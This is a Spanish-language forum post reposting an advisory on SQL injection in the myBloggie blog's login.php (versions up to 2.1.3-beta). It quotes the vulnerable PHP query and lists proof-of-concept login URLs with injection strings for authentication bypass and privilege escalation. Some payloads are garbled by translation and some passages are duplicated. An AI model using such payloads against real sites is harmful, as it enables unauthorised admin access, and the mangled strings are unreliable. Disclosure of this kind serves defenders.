Autor
vulnerable a inyección SQL causada por la validación incorrecta de entradas user-supplied. Esta vulnerabilidad se puede explotar para puentear el mecanismo de la autentificación, extender los privilegios al nivel del administrador y también para revelar la información del sistema.
Sistemas Vulnerables:
versiones 2.1.3-beta del myBloggie y anteriores
Código vulnerable:
Código:
<----------------------------login.php snippet--------------->
if (isset($_POST['username'])) {
$username=$_POST['username'];
} else $username="";
$result = mysql_query( "SELECT user FROM ".USER_TBL." WHERE user='$username'
AND password='$passwd'" ) or error( mysql_error() );
<---------------------------------------------------------------------->
if (isset($_POST['username'])) {
$username=$_POST['username'];
} else $username="";
$result = mysql_query( "SELECT user FROM ".USER_TBL." WHERE user='$username'
AND password='$passwd'" ) or error( mysql_error() );
<---------------------------------------------------------------------->
Esto se puede explotar de diversas maneras:
1. Authentication Bypass: Un usuario malévolo puede entrar al sistema del weblog sin necesitar la contraseña poniendo preguntas tales como esta "admin ' O ' x'='x" en el campo del usuario.
2. Privilege Escalation: Cuando un usuario no-administrativo coloca, por ejemplo "user1 ' O ' el x'='x", en el campo del usuario, los privilegios administrativos serán concedidos.
Prueba de Concepto:
Código:
http://example.com/mybloggie/login.php?username=admin ' O ' x'='x
http://example.com/mybloggie/login.php?username=normal_user ' O ' one'='one
http://example.com/mybloggie/login.php?username='1=1 --
http://example.com/mybloggie/login.php?username=normal_user ' O ' one'='one
http://example.com/mybloggie/login.php?username='1=1 --
Fuente:SecuritiTeam
Salu2
En línea
pero buscando en google...
